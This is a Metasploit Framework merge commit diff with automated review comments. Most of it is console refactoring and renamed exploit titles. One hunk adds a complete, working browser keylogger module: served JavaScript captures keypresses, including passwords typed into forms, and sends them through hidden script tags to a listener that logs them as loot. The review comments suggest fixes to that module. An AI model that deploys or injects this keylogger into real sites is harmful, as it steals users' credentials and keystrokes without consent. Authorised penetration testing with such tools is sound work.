Merge branch 'master' of github.com:rapid7/metasploit-framework

unstable
sinn3r 2012-02-21 11:50:05 -06:00
commit a288742376
17 changed files with 422 additions and 77 deletions



@ -1,6 +1,14 @@
Armitage Changelog
==================
21 Feb 12
---------
- Added Cut/Copy/Paste menu to table cell editor.
- Module browser search field now treats spaces as a wildcard. You may type:
"win meterp" and Armitage will treat it as "win*meterp"
- Hovering over an edge in graph view no longer reports a "null" tooltip
- Fixed parsing of ps output for the process dialog (it's much much better now)
14 Feb 12
---------
- Added ports 5631 (pc anywhere) and 902 (vmauthd) to the MSF Scans feature.


@ -28,7 +28,6 @@ class Db
#
def commands
base = {
"db_driver" => "Specify a database driver",
"db_connect" => "Connect to an existing database",
"db_disconnect" => "Disconnect from the current database instance",
"db_status" => "Show the current database status",
@ -1262,44 +1261,6 @@ class Db
end
end
def cmd_db_driver(*args)
if(args[0])
if(args[0] == "-h" || args[0] == "--help")
print_status("Usage: db_driver [driver-name]")
return
end
if(framework.db.drivers.include?(args[0]))
framework.db.driver = args[0]
print_status("Using database driver #{args[0]}")
else
print_error("Invalid driver specified")
end
return
end
if(framework.db.driver)
print_status(" Active Driver: #{framework.db.driver}")
else
print_status("No Active Driver")
end
print_status(" Available: #{framework.db.drivers.join(", ")}")
print_line("")
if ! framework.db.drivers.include?('postgresql')
print_status(" DB Support: Enable the postgresql driver with the following command:")
print_status(" * This requires libpq-dev and a build environment")
print_status(" $ gem install postgres")
print_status(" $ gem install pg # is an alternative that may work")
print_line("")
end
end
def cmd_db_driver_tabs(str, words)
return framework.db.drivers
end
def cmd_db_connect_help
# Help is specific to each driver
cmd_db_connect("-h")


@ -109,7 +109,7 @@ class Console::CommandDispatcher::Core
# Performs operations on the supplied channel.
#
def cmd_channel(*args)
if args.include?("-h") or args.include?("--help")
if args.empty? or args.include?("-h") or args.include?("--help")
cmd_channel_help
return
end
@ -180,14 +180,35 @@ class Console::CommandDispatcher::Core
end
end
def cmd_channel_tabs(str, words)
case words.length
when 1
@@channel_opts.fmt.keys
when 2
case words[1]
when "-c", "-i", "-r", "-w"
tab_complete_channels
else
[]
end
else
[]
end
end
def cmd_close_help
print_line "Usage: close <channel_id>"
print_line
print_line "Closes the supplied channel."
print_line
end
#
# Closes a supplied channel.
#
def cmd_close(*args)
if (args.length == 0)
print_line(
"Usage: close channel_id\n\n" +
"Closes the supplied channel.")
cmd_close_help
return true
end
@ -204,6 +225,12 @@ class Console::CommandDispatcher::Core
end
end
def cmd_close_tabs(str, words)
return [] if words.length > 1
return tab_complete_channels
end
#
# Terminates the meterpreter session.
#
@ -216,6 +243,17 @@ class Console::CommandDispatcher::Core
alias cmd_quit cmd_exit
def cmd_detach_help
print_line "Detach from the victim. Only possible for non-stream sessions (http/https)"
print_line
print_line "The victim will continue to attempt to call back to the handler until it"
print_line "successfully connects (which may happen immediately if you have a handler"
print_line "running in the background), or reaches its expiration."
print_line
print_line "This session may #{client.passive_service ? "" : "NOT"} be detached."
print_line
end
#
# Disconnects the session
#
@ -228,14 +266,19 @@ class Console::CommandDispatcher::Core
shell.stop
end
def cmd_interact_help
print_line "Usage: interact <channel_id>"
print_line
print_line "Interacts with the supplied channel."
print_line
end
#
# Interacts with a channel.
#
def cmd_interact(*args)
if (args.length == 0)
print_line(
"Usage: interact channel_id\n\n" +
"Interacts with the supplied channel.")
cmd_info_help
return true
end
@ -251,6 +294,8 @@ class Console::CommandDispatcher::Core
end
end
alias cmd_interact_tabs cmd_close_tabs
#
# Runs the IRB scripting shell
#
@ -261,15 +306,20 @@ class Console::CommandDispatcher::Core
Rex::Ui::Text::IrbShell.new(binding).run
end
def cmd_migrate_help
print_line "Usage: migrate <pid>"
print_line
print_line "Migrates the server instance to another process."
print_line "NOTE: Any open channels or other dynamic state will be lost."
print_line
end
#
# Migrates the server to the supplied process identifier.
#
def cmd_migrate(*args)
if (args.length == 0)
print_line(
"Usage: migrate pid\n\n" +
"Migrates the server instance to another process.\n" +
"Note: Any open channels or other dynamic state will be lost.")
cmd_migrate_help
return true
end
@ -371,14 +421,19 @@ class Console::CommandDispatcher::Core
alias cmd_use_help cmd_load_help
alias cmd_use_tabs cmd_load_tabs
def cmd_read_help
print_line "Usage: read <channel_id> [length]"
print_line
print_line "Reads data from the supplied channel."
print_line
end
#
# Reads data from a channel.
#
def cmd_read(*args)
if (args.length == 0)
print_line(
"Usage: read channel_id [length]\n\n" +
"Reads data from the supplied channel.")
cmd_read_help
return true
end
@ -402,6 +457,8 @@ class Console::CommandDispatcher::Core
return true
end
alias cmd_read_tabs cmd_close_tabs
def cmd_run_help
print_line "Usage: run <script> [arguments]"
print_line
@ -669,17 +726,15 @@ class Console::CommandDispatcher::Core
return true
end
def cmd_resource_tabs(str, words)
return [] if words.length > 1
tab_complete_filenames(str, words)
def cmd_resource_help
print_line "Usage: resource <path1> [path2 ...]"
print_line
print_line "Run the commands stored in the supplied files."
print_line
end
def cmd_resource(*args)
if args.empty?
print(
"Usage: resource path1 path2" +
"Run the commands stored in the supplied files.\n")
return false
end
args.each do |glob|
@ -710,6 +765,12 @@ class Console::CommandDispatcher::Core
end
end
def cmd_resource_tabs(str, words)
return [] if words.length > 1
tab_complete_filenames(str, words)
end
def cmd_enable_unicode_encoding
client.encode_unicode = true
print_status("Unicode encoding is enabled")
@ -799,6 +860,10 @@ protected
tabs.compact
end
def tab_complete_channels
client.channels.keys.map { |k| k.to_s }
end
end
end
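Review bot: In cmd_interact the new no-argument branch calls `cmd_info_help` instead of the `cmd_interact_help` defined a few lines above in the same hunk, so `interact` with no channel id prints the wrong help text (or raises NoMethodError if this dispatcher has no cmd_info_help); the line should read `cmd_interact_help`. The other commands converted in this section (cmd_close, cmd_migrate, cmd_read) each call their own *_help method, so this looks like a copy-paste slip. In cmd_resource the no-argument path still appears to print `"Usage: resource path1 path2" + "Run the commands stored in the supplied files.\n"` directly, with no newline between the two fragments, even though cmd_resource_help is added in the same hunk; if that block is not replaced elsewhere in the file, it should call `cmd_resource_help` as well. The bodies of cmd_interact and cmd_resource continue outside their hunks.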


@ -0,0 +1,311 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Capture: HTTP JavaScript Keylogger',
'Description' => %q{
This modules runs a web server that demonstrates keystroke
logging through JavaScript. The DEMO option can be set to enable
a page that demonstrates this technique. Future improvements will
allow for a configurable template to be used with this module.
To use this module with an existing web page, simply add a
script source tag pointing to the URL of this service ending
in the .js extension. For example, if URIPATH is set to "test",
the following URL will load this script into the calling site.
http://server:port/test/anything.js
},
'License' => MSF_LICENSE,
'Author' => ['Marcus J. Carey <mjc[at]threatagent.com>', 'hdm'],
))
register_options(
[
OptBool.new('DEMO', [true, "Creates HTML for demo purposes", false]),
], self.class)
end
# This is the module's main runtime method
def run
@seed = Rex::Text.rand_text_alpha(12)
@client_cache = {}
# Starts Web Server
exploit
end
# This handles the HTTP responses for the Web server
def on_request_uri(cli, request)
cid = nil
if request['Cookie'].to_s =~ /,?\s*id=([a-f0-9]{4,32})/i
cid = $1
end
if not cid and request.qstring['id'].to_s =~ /^([a-f0-9]{4,32})/i
cid = $1
end
data = request.qstring['data']
unless cid
cid = generate_client_id(cli,request)
print_status("#{cli.peerhost} Assigning client identifier '#{cid}'")
resp = create_response(302, 'Moved')
resp['Content-Type'] = 'text/html'
resp['Location'] = request.uri + '?id=' + cid
resp['Set-Cookie'] = "id=#{cid}"
cli.send_response(resp)
return
end
base_url = generate_base_url(cli, request)
# print_status("#{cli.peerhost} [#{cid}] Incoming #{request.method} request for #{request.uri}")
case request.uri
when /\.js(\?|$)/
content_type = "text/plain"
send_response(cli, generate_keylogger_js(base_url, cid), {'Content-Type'=> content_type, 'Set-Cookie' => "id=#{cid}"})
when /\/demo\/?(\?|$)/
if datastore['DEMO']
content_type = "text/html"
send_response(cli, generate_demo(base_url, cid), {'Content-Type'=> content_type, 'Set-Cookie' => "id=#{cid}"})
else
send_not_found(cli)
end
else
if data
nice = process_data(cli, request, cid, data)
script = datastore['DEMO'] ? generate_demo_js_reply(base_url, cid, nice) : ""
send_response(cli, script, {'Content-Type' => "text/plain", 'Set-Cookie' => "id=#{cid}"})
else
if datastore['DEMO']
send_redirect(cli, "/demo/?cid=#{cid}")
else
send_not_found(cli)
end
end
end
end
# Figure out what our base URL is based on the user submitted
# Host header or the address of the client.
def generate_base_url(cli, req)
port = nil
host = Rex::Socket.source_address(cli.peerhost)
if req['Host']
host = req['Host']
bits = host.split(':')
# Extract the hostname:port sequence from the Host header
if bits.length > 1 and bits.last.to_i > 0
port = bits.pop.to_i
host = bits.join(':')
end
else
port = datastore['SRVPORT'].to_i
end
prot = (!! datastore['SSL']) ? 'https://' : 'http://'
if Rex::Socket.is_ipv6?(host)
host = "[#{host}]"
end
base = prot + host
if not ((prot == 'https' and port.nil?) or (prot == 'http' and port.nil?))
base << ":#{port}"
end
base << get_resource
end
def process_data(cli, request, cid, data)
lines = [""]
real = ""
Rex::Text.uri_decode(data).split(",").each do |char|
byte = char.to_s.hex.chr
next if byte == "\x00"
real << byte
case char.to_i
# Do Backspace
when 8
lines[-1] = lines[-1][0, lines[-1].length - 1] if lines[-1].length > 0
when 13
lines << ""
else
lines[-1] << byte
end
end
nice = lines.join("<CR>").gsub("\t", "<TAB>")
real = real.gsub("\x08", "<DEL>")
if not @client_cache[cid]
fp = fingerprint_user_agent(request['User-Agent'] || "")
header = "Browser Keystroke Log\n"
header << "=====================\n"
header << "Created: #{Time.now.to_s}\n"
header << "Address: #{cli.peerhost}\n"
header << " ID: #{cid}\n"
header << " FPrint: #{fp.inspect}\n"
header << " URL: #{request.uri}\n"
header << "\n"
header << "====================\n\n"
@client_cache[cid] = {
:created => Time.now.to_i,
:path_clean => store_loot("browser.keystrokes.clean", "text/plain", cli.peerhost, header, "keystrokes_clean_#{cid}.txt", "Browser Keystroke Logs (Clean)"),
:path_raw => store_loot("browser.keystrokes.raw", "text/plain", cli.peerhost, header, "keystrokes_clean_#{cid}.txt", "Browser Keystroke Logs (Raw)")
}
print_good("#{cli.peerhost} [#{cid}] Logging clean keystrokes to: #{@client_cache[cid][:path_clean]}")
print_good("#{cli.peerhost} [#{cid}] Logging raw keystrokes to: #{@client_cache[cid][:path_raw]}")
end
::File.open( @client_cache[cid][:path_clean], "a") { |fd| fd.puts nice }
::File.open( @client_cache[cid][:path_raw], "a") { |fd| fd.write(real) }
if nice.length > 0
print_good("#{cli.peerhost} [#{cid}] Keys: #{nice}")
end
nice
end
def generate_client_id(cli, req)
"%.8x" % Kernel.rand(0x100000000)
end
def generate_demo(base_url, cid)
# This is the Demo Form Page <HTML>
html = <<EOS
<html>
<head>
<title>Demo Form</title>
<script type="text/javascript" src="#{base_url}/#{@seed}.js?id=#{cid}"></script>
</head>
<body bgcolor="white">
<br><br>
<div align="center">
<h1>Keylogger Demo Form</h1>
<form method=\"POST\" name=\"logonf\" action=\"#{base_url}/demo/?id=#{cid}\">
<p><font color="red"><i>This form submits data to the Metasploit listener for demonstration purposes.</i></font>
<br><br>
<table border="0" cellspacing="0" cellpadding="0">
<tr><td>Username:</td> <td><input name="username" size="20"></td> </tr>
<tr><td>Password:</td> <td><input type="password" name="password" size="20"></td> </tr>
</table>
<p align="center"><input type="submit" value="Submit"></p></form>
<br/>
<textarea cols="80" rows="5" id="results">
</textarea>
</div>
</body>
</html>
EOS
return html
end
# This is the JavaScript Key Logger Code
def generate_keylogger_js(base_url, cid)
targ = Rex::Text.rand_text_alpha(12)
code = <<EOS
var c#{@seed} = 0;
window.onload = function load#{@seed}(){
l#{@seed} = ",";
if (window.addEventListener) {
document.addEventListener('keypress', p#{@seed}, true);
document.addEventListener('keydown', d#{@seed}, true);
} else if (window.attachEvent) {
document.attachEvent('onkeypress', p#{@seed});
document.attachEvent('onkeydown', d#{@seed});
} else {
document.onkeypress = p#{@seed};
document.onkeydown = d#{@seed};
}
}
function p#{@seed}(e){
k#{@seed} = (window.event) ? window.event.keyCode : e.which;
k#{@seed} = k#{@seed}.toString(16);
if (k#{@seed} != "d"){
#{@seed}(k#{@seed});
}
}
function d#{@seed}(e){
k#{@seed} = (window.event) ? window.event.keyCode : e.which;
if (k#{@seed} == 9 || k#{@seed} == 8 || k#{@seed} == 13){
#{@seed}(k#{@seed});
}
}
function #{@seed}(k#{@seed}){
l#{@seed} = l#{@seed} + k#{@seed} + ",";
var t#{@seed} = "#{targ}" + c#{@seed};
c#{@seed}++;
var f#{@seed};
if (document.all)
f#{@seed} = document.createElement("<script name='" + t#{@seed} + "' id='" + t#{@seed} + "'></script>");
else {
f#{@seed} = document.createElement("script");
f#{@seed}.setAttribute("id", t#{@seed});
f#{@seed}.setAttribute("name", t#{@seed});
}
f#{@seed}.setAttribute("src", "#{base_url}?id=#{cid}&data=" + l#{@seed});
f#{@seed}.style.visibility = "hidden";
document.body.appendChild(f#{@seed});
if (k#{@seed} == 13 || l#{@seed}.length > 3000)
l#{@seed} = ",";
setTimeout('document.body.removeChild(document.getElementById("' + t#{@seed} + '"))', 5000);
}
EOS
return code
end
def generate_demo_js_reply(base_url, cid, data)
code = <<EOS
try {
document.getElementById("results").value = "Keystrokes: #{data}";
} catch(e) { }
EOS
return code
end
end
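Review bot: In process_data the `:path_raw` loot entry is stored under the file name `keystrokes_clean_#{cid}.txt`, the same name used for `:path_clean`, so the raw log is mislabeled and, depending on how store_loot derives its on-disk path, may collide with the clean log; change it to `"keystrokes_raw_#{cid}.txt"`. In generate_base_url the guard compares `prot` (which holds 'http://' or 'https://') against 'http' and 'https', which never matches, so `base << ":#{port}"` runs even when port is nil and yields a URL like `http://host:` for a Host header without a port; `base << ":#{port}" if port` expresses the intent. Since `data` comes straight from the query string, `char.to_s.hex.chr` will also raise RangeError for any hex value above 255 and abort the handler mid-request, so the loop should skip values outside 0..255 before calling `chr`.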


@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info={})
super(update_info(info,
'Name' => 'PmWiki <= 2.2.34 (pagelist) Remote PHP Code Execution',
'Name' => 'PmWiki <= 2.2.34 pagelist.php Remote PHP Code Injection Exploit',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability
in PmWiki from 2.0.0 to 2.2.34. The vulnerable function is


@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'vBSEO <= 3.6.0 "proc_deutf()" Remote PHP Code Injection',
'Name' => 'vBSEO <= 3.6.0 proc_deutf() Remote PHP Code Injection',
'Description' => %q{
This module exploits a vulnerability in the 'proc_deutf()' function
defined in /includes/functions_vbseocp_abstract.php. User input passed through


@ -24,14 +24,14 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability',
'Name' => 'Mozilla Firefox 3.6.16 mChannel Use-After-Free',
'Description' => %q{
This module exploits a use-after-free vulnerability in Mozilla
Firefox 3.6.16. An OBJECT Element mChannel can be freed via the
Firefox 3.6.16. An OBJECT element, mChannel, can be freed via the
OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel
becomes a dangling pointer and can be reused when setting the OBJECTs
data attribute. (Discovered by regenrecht). Mac OS X version by argp,
tested on Mac OS X 10.6.6, 10.6.7, 10.6.8, 10.7.2 and 10.7.3.
data attribute. This module has been tested on Mac OS X 10.6.6, 10.6.7,
10.6.8, 10.7.2 and 10.7.3.
},
'License' => MSF_LICENSE,
'Author' =>


@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'CCMPlayer 1.5 Stack based Buffer Overflow (.m3u)',
'Name' => 'CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening
a m3u playlist with a long track name, a SEH exception record can be overwritten


@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Free MP3 CD Ripper 1.1 (WAV File) Stack Buffer Overflow',
'Name' => 'Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in Free MP3 CD
Ripper 1.1. The overflow is triggered when an unsuspecting user opens a malicious


@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Mini-Stream RM-MP3 Converter v3.1.2.1 (PLS File) Stack Buffer Overflow',
'Name' => 'Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3
Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim


@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)',
'Name' => 'AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow',
'Description' => %q{
This module exploits VanDyke Software AbsoluteFTP by overflowing
a filename buffer related to the LIST command.


@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Serv-U FTP Server <4.2 Buffer Overflow',
'Name' => 'Serv-U FTP Server < 4.2 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the site chmod command
in versions of Serv-U FTP Server prior to 4.2.


@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'StreamDown 6.8.0 Buffer overflow',
'Name' => 'StreamDown 6.8.0 Buffer Overflow',
'Description' => %q{
Stream Down 6.8.0 seh based buffer overflow triggered when processing
the server reponse packet.During the overflow a structured exception


@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info={})
super(update_info(info,
'Name' => "Wireshark console.lua pre-loading vulnerability",
'Name' => "Wireshark console.lua Pre-Loading Script Execution",
'Description' => %q{
This modules exploits a vulnerability in Wireshark 1.6 or less. When opening a
pcap file, Wireshark will actually check if there's a 'console.lua' file in the same
@ -335,4 +335,4 @@ But on a fully patched XP SP3, the same URI format will not work. Windows will t
the share via SMB, and the victim will not see the share. In this case, you should specify
the URI to like this:
http://192.168.1.11/files
=end
=end


@ -16,7 +16,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Gather RazorSQL credentials',
'Name' => 'Windows Gather RazorSQL Credentials',
'Description' => %q{
This module stores username, password, type, host, port, database (and name)
collected from profiles.txt of RazorSQL.
@ -154,4 +154,4 @@ end
=begin
http://www.razorsql.com/download.html
Tested on: v5.6.2 (win32)
=end
=end


@ -17,7 +17,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Disconnect Wireless Connection ',
'Name' => 'Windows Disconnect Wireless Connection',
'Description' => %q{
This module disconnects the current wireless network connection
on the specified interface.